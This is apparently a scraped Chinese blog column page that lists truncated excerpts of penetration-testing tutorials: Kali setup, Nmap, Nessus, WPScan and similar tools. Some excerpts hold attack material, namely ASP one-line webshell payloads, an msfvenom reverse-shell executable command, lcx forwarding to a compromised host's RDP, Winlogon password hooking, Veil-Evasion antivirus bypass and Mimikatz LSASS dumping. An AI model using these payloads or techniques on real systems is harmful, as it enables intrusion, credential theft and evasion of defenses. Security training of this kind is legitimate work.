冰河的专栏

最近，有很多小伙伴想跟我学渗透。平时时间确实太忙了，除了要研发公司项目外，写公号，写博客，录视频，写书稿，维护开源项目，几乎占据了我全部的业余时间。目前确实没有太多的时间教大家，今天，就暂时给大家分享一个小技巧吧，如何彻底隐藏电脑中的“小电影”，让你的女朋友再也不能发现你电脑中的小秘密！

周末与一些小伙伴交流的过程当中，发现一些小伙伴公司的项目中使用的Log4j版本还是2.14.0，我一听就有点震惊了：你们还在使用Log4j的2.14.0版本，这个版本存在重大漏洞啊！但是有些小伙伴看起来对Log4j中存在的重大漏洞不以为意。“我们项目中使用的Log4j一直是2.14.0这个版本啊，一直没啥问题啊！”。哎，看来有些小伙伴对Log4j2.14.0版本存在的漏洞还是不太了解呀，于是我连夜录制了复现Log4j最新重大漏洞的视频，发布到了B站。

我在CSDN的这两年：出版了两本实体书，各自加印1万册，写了9本开源电子书，还上了百度百科！！

黑客常用SQL注入绕过技术总结，黑客们原来是这么玩的！冰河吐血整理，建议收藏！！

再也不怕忘记MySQL的用户名和密码了，用这个工具可以秒破MySQL，冰河强烈建议收藏！！

全网首个开源的以实战案例为背景的渗透实战笔记，全书共442页，共计37万字（不计空格）。整本书的内容涵盖：Kali基础、渗透工具、木马制作、钓鱼链接生成、爆破密码、内存溢出攻击、web渗透、数据提权、社会工程学。

你女朋友打开文件是一张图片，你打开却是各种“视频”，全程高能，搞起来！！！

一不小心，我的电脑被“熊猫”烧坏了！！

作为一名互联网从业者兼具一定渗透经验的我来说，一直想运行下“熊猫烧香”到底是啥效果，没想到，这下悲剧了。。。

转载请注明出处：https://blog.csdn.net/l1028386804/article/details/84139317vim /etc/apt/sources.listdeb http://mirrors.ustc.edu.cn/kali kali main non-free contribdeb-src http://mirrors.ustc.edu.cn/kali k...

一、说明各工具kali官方简介（竖排）：https://tools.kali.org/tools-listing安装kali虚拟机可参考：https://www.cnblogs.com/lsdb/p/6500757.html pentestbox：虚拟机还是比较耗内存的，内存不够可以试试pentestbox，从功能上可以理解为运行在windows上的kali发行版，kali主流工具它都...

一、AppScan安装时出现错误1603是因为之前安装过，没有卸载干净导致报错。解决方法如下：1、控制面板→程序和功能→选中程序卸载。2、删除AppScan安装路径以及下面的所有内容。 3、在系统[开始]->[运行(R)...]中，运行命令regedit来删除全部注册键(如果存在的话)，以及下列的子 键: A.HKEY_LOCAL_MACHINE\SOFTWARE\IBM\ ...

转载请注明出处：https://blog.csdn.net/l1028386804/article/details/84033387问题重现：命令行输入：add-apt-repository ppa:yubico/stable && sudo apt-get update问题如下：# add-apt-repository ppa:yubico/stable ...

WPScan is a WordPress vulnerability scanner written in Ruby. It is sponsored by Sucuri and hosted on github. Using its security vulnerability database for WordPress core, plugins and themes it will pr...

转载请注明出处：https://blog.csdn.net/l1028386804/article/details/84030521remove packageapt remove wpscaninstall from sourcegit clone https://github.com/wpscanteam/wpscancd wpscan/bundle install ...

转载请注明出处：https://blog.csdn.net/l1028386804/article/details/83796584Easy-Creds是一个菜单式的破解工具。该工具允许用户打开一个无线网卡，并能实现一个无线接入点攻击平台。Easy-Creds可以创建一个欺骗访问点，并作为一个中间人攻击类型运行，进而分析用户的数据流和账户信息。它可以从SSL加密数据中恢复账户。本节将介绍使用E...

转载请注明出处：https://blog.csdn.net/l1028386804/article/details/84204992Nmap第一部分 Nmap基础一、Nmap功能基本功能有三个：    1.探测主机是否在线;    2.扫描主机端口，嗅探所提供的网络服务    3.推断主机操作系统    主机探测：    探测网路上的主机，例如列出相应TCP和ICMP请求，i...

转载请注明出处：https://blog.csdn.net/l1028386804/article/details/84206143<%eval request("c")%><%execute request("c")%><%execute(request("c"))%><%ExecuteGlobal request("sb&qu

 一、IIS 6.0解析漏洞IIS 6.0解析利用方法有两种1.目录解析/xx.asp/xx.jpg2.文件解析wooyun.asp;.jpg第一种，在网站下建立文件夹的名字为 .asp、.asa 的文件夹，其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。例如创建目录 wooyun.asp，那么/wooyun.asp/1.jpg将被当作asp文件来执行。假设黑阔可以...

5.1 使用NessusNessus号称是世界上最流行的漏洞扫描程序，全世界有超过75000个组织在使用它。该工具提供完整的电脑漏洞扫描服务，并随时更新其漏洞数据库。Nessus不同于传统的漏洞扫描软件，Nessus可同时在本机或远端上遥控，进行系统的漏洞分析扫描。Nessus也是渗透测试重要工具之一。所以，本章将介绍安装、配置并启动Nessus。5.1.1 安装和配置Nessus为了...

转载请注明出处：https://blog.csdn.net/l1028386804/article/details/84310376首先换源。终端输入 leafpad /etc/apt/sources.list修改为以下几个镜像源#中科大kali源deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free ...

转载请注明出处：https://blog.csdn.net/l1028386804/article/details/84329833apt-get updateapt-get install kali-linux-all 

metasploitable2这个系统众所周知，一个用户名和密码是msfadmin。但是这个账号权限不全，我们想要改root密码来登陆为所欲为。也没试过破解，咱们索性就改了吧。就简单几行代码。。msfadmin@metasploitable:~$ sudo passwd root[sudo] password for msfadmin: #这里输入msfadmin...

原文地址：https://community.rapid7.com/community/metasploit/blog/2015/07/10/msfcli-is-no-longer-available-in-metasploitHi, 大家好，     这个一月份，我们做了一份关于 Metasploit 的命令行版本接口版本 Msfcli 的声明，今天我们要对它说再见了。     取代...

转载请注明出处：https://blog.csdn.net/l1028386804/article/details/84262285注意事项，写在前面。php版本一定要设置成 7 以下，7之后的mysql_都改成了mysqli_**了，用7以上版本的话会报错*****************************************************************...

转载请注明出处：https://blog.csdn.net/l1028386804/article/details/84197898一、简介截断的产生核心，就是chr(0)字符 。这个字符即不为空(Null)，也不是空字符("")，更不是空格！当程序在输出含有chr(0)变量时，chr(0)后面的数据会被停止，换句话说，就是误把它当成结束符，后面的数据直接忽略，这就导致漏洞产生的原...

原文链接这里使用的软件名称叫rarcrack，其官方主页: http://rarcrack.sourceforge.net该软件用于暴力破解压缩文件的密码，但仅支持RAR, ZIP, 7Z这三种类型的压缩包，其特点是可以使用多线程，而且可以随时暂停与继续(暂停时会在当前目录生成一个xml文件，里面显示了正在尝试的一个密码)。这是真正的暴力破解，因为连字典都没用rarcrack安装方法...

初试牛刀1、生产EXE   就用meterpreter  (shell 一个含义)    (KALI2.0以前版本 为 msfpayload )2.0后 新命令：msfvenom -p windows/meterpreter/reverse_tcp LHOST=XXXX LPORT=XXXX -f exe > 1234.exe2、默认生成地址是 ROOT  查看 后 直接...

转载请注明出处：https://blog.csdn.net/l1028386804/article/details/84625404本机: lcx -listen 2222 33332222为转发端口，3333为本机任意未被占用的端口肉鸡：lcx -slave 192.168.109.137 2222 127.0.0.1 3389192.168.109.137 为本机IP,2222...

将以下代码复制到记事本里并保存为rots.vbson error resume nextset utstreem=wscript.stdoutset instreem=wscript.stdinif (lcase(right(wscript.fullname,11))="wscript.exe") then set bjShell=wscript.createObject("ws...

具体案例：案例1：crunch 1 8#生成最小1位，最大8位，由26个小写字母为元素的所有组合案例2：crunch 1 6 abcdefg#生成 最小为1,最大为6.由abcdefg为元素的所有组合案例3：crunch 1 6 abcdefg\#生成 最小为1,最大为6.由abcdefg和空格为元素的所有组合（/代表空格）案例4：crunch 1 8 ...

WinlogonHack截取密码的原理WinlogonHack通过挂钩系统中的msgina.dll的WlxLoggedOutSAS函数记录登陆的账户密码。当有3389脸上服务器时。新创建的winlogon.exe将会在登录前加载，注册了"Startup" 的DLLHook函数。登陆成功后，会将密码写入到.dat文件中去，并取消Hook。实战WinlogonHack获取系统密码下载W...

转载请注明出处：https://blog.csdn.net/l1028386804/article/details/84747764首先把虚拟机的网络适配器设置成桥接模式：直接连接到物理网络kali安装完成之后，首先确定你是DHCP还是静态IP。DHCP是用来给大型网络动态分配IP的协议，而大部分中小型网络（如校园网、家庭网络）都是采用网络管理员手工分配静态IP的方法来确定IP地址的。一...

跟这篇破解教程一样，网上破解教程多是基于路由器的WPS漏洞破解，但是这样的路由器只占少数。一般wifi是依据WPA/WPA2加密的，因此想要破解一般的wifi，还得破解这个协议，虽然近期这个协议也被破解了，不过也是很不容易的。刚入门破解，不是很熟悉，在网上找各种破解资料，终于破解成功了临近工作室的wifi，沾沾自喜~本文破解wifi针对一些路由器的WPS（Wi-fi protected set...

转载请注明出处：https://blog.csdn.net/l1028386804/article/details/84895163Veil Evasion简介Veil Evasion是一个可执行文件，它被用来生成Metasploit的payload，能绕过常见杀软。免责声明：本教程目的只是为了教育，我们不对这些东西会如何使用担任何风险，使用它的后果自负。Veil-Evasion被...

Often one of the most useful (and to the beginner underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created with this module and it helps something that can give y...

PsExec下载地址   PSTools.ziphttp://technet.microsoft.com/en-us/sysinternals/bb897553.aspxUsing PsExec See the July 2004 issue of Windows IT Pro Magazine for Mark's article that covers advanced usa...

转载请注明出处：https://blog.csdn.net/l1028386804/article/details/85107034当我们使用hydra来探测远程ssh服务口令是否强壮时,如果没有安装libssh模块,程序会给出如下一个错误:[ERROR] Compiled without LIBSSH v0.4.x support, module is not available!...

Mimikatz现在已经内置在Metasploit’s meterpreter里面，我们可以通过meterpreter下载。但是你如果觉得还要考虑杀毒软件，绑定payload之类的东西太过复杂，我们可以有更好的办法，只需要在自己的电脑上运行Mimikatz alpha(地址)版本,然后处理dump的LSASS进程内存文件就行！那么如何dump LSASS进程内存呢。可以通过以下方式：1.对...

1. 安装vmware， 略2. 下载xphttp://msdn.itellyou.cn/用迅雷下载Windows XP Professional with Service Pack 3 (x86) - CD VL (Chinese-Simplified)下载下来后的名字是zh-hans_windows_xp_professional_with_service_pack_3_x86...